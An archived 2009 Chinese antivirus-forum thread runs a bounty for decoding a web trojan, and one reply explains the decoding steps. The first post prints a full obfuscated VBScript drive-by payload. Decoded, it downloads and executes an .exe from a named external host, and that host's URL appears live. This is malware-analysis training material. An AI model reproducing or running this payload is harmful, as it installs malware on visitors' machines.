瑞星卡卡安全论坛技术交流区恶意网站交流 【已结束】网马解密悬赏第三十一期

1   1  /  1  页   跳转

[悬赏] 【已结束】网马解密悬赏第三十一期

【已结束】网马解密悬赏第三十一期



引用:
http://bp20001983.googlepages.com/google.htm



引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:论坛所有爱好者均可参加


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2009-09-10 16:07:26
分享到:
gototop
 

如链接地址失效,请用下面代码进行解密



<SCRIPT language=vbscript>
hu="琳*Vb[Z,琳*aQ`W^bmZO\UcOUS+oD0AQ`W^bo,琳mm]\mS``]`m`Sac[Sm\Sfb琳mmgg+o]PXSQbo琳mmggg+oQZOaaWRo琳mmgggg+oQZaWR(02'$1##$z$#/!z~~2}z'&!/z}}1}""41 '3!$o琳mmggggg+o;WQ`]a]Tb{F;:6BB>o琳mmgggggg+o53Bo琳mmggggggg+oAQ`W^bW\U{4WZSAgabS[=PXSQbo琳mmgggggggg+oAVSZZ{/^^ZWQObW]\o琳mmRdm+moVbb^(||P^ }}}~'&!{U]]UZS^OUSa{Q][|fWOhOW{SfSo琳mmASbmRTm+mR]Qc[S\b{Q`SObS3ZS[S\buggv琳mmRT{aSb/bb`WPcbSmgggymgggg琳mmab`+ggggg琳mmASbmgm+mRT{1`SObS=PXSQbuab`yoov琳mmO~+o/o琳mmP~+oR]o琳mmQ~+oRo琳mmO +oP{o琳mmO!+oAo琳mmP!+ob`o琳mmO""+oSOo琳mmO#+o[o琳mmab`~+O~sP~sQ~sO sO!sP!sO""sO#琳mmab`#+ab`~琳mmaSbmDm+mRT{Q`SObS]PXSQbuab`#yoov琳mmD{bg^Sm+m~琳mmab`$+gggggg琳mmg{=^S\mab`$ymRdym4OZaS琳mmg{AS\R琳mmT\O[S~+oU}ZR{Q][o琳mmaSbm5m+mRT{Q`SObS]PXSQbugggggggyoov琳mmaSbmb[^m+m5{5SbA^SQWOZ4]ZRS`u vm琳mmT\O[S~+m5{0cWZR>ObVub[^yT\O[S~v琳mmD{]^S\琳mmD{e`WbSmg{`Sa^]\aS0]Rg琳mmD{aOdSb]TWZSmT\O[S~y 琳mmD{QZ]aS琳mmaSbm?m+mRT{Q`SObS]PXSQbuggggggggyoov琳mm?{AVSZZ3fSQcbSmT\O[S~yooyooyo]^S\oy}琳mm*|aQ`W^b,琳mmmm*|aQ`W^b,琳mmmm*VSOR,琳mmmm*bWbZS,载入中{{{{*|bWbZS,琳mmmm*|VSOR,*P]Rg,琳*QS\bS`,*P`,资源载入中y请稍后{{{{{{{{{{{{{*|QS\bS`,琳mmmm*|P]Rg,*|Vb[Z,琳"
function UnEncode(temp)
but=77
for i = 1 to len(temp)
    if mid(temp,i,1)<> "琳" then
If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
            if pk>126 then
                    pk=pk-95
            elseif pk<32 then
                    pk=pk+95
            end if
            a=a&chr(pk)
end if
  else
            a=a&vbcrlf
  end if
next
UnEncode=a
end function
document.write(UnEncode(hu))
</SCRIPT>


gototop
 

回复:网马解密悬赏第三十一期

1.首先将上面那段代码复制并且保存为HTML格式;
2.再将里面的document.write(UnEncode(hu)) 改为alert(UnEncode(hu)),也就是将document.write改为alert;
3.然后双击该修改好的HTML文档, 即可得到解密结果。
4.hxxp://bp20001983.googlepages.com/xiazai.exe;这是最终结果
如下图所示:


也可用工具redoce来解:
1.先执行--4>标出document.write位置,再将其改为alert;
2.然后解密--6>Eval()清除(Beta!),可得到相同的结果。
原理一样,方法多多。如有不对的地方,请版主大牛们多加指点,3Q。
本帖被评分 1 次
最后编辑redbsd 最后编辑于 2009-09-10 15:46:22
gototop
 

回复:网马解密悬赏第三十一期

哦,楼上很好
gototop
 

回复:网马解密悬赏第三十一期

ls的大版主好久不见
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT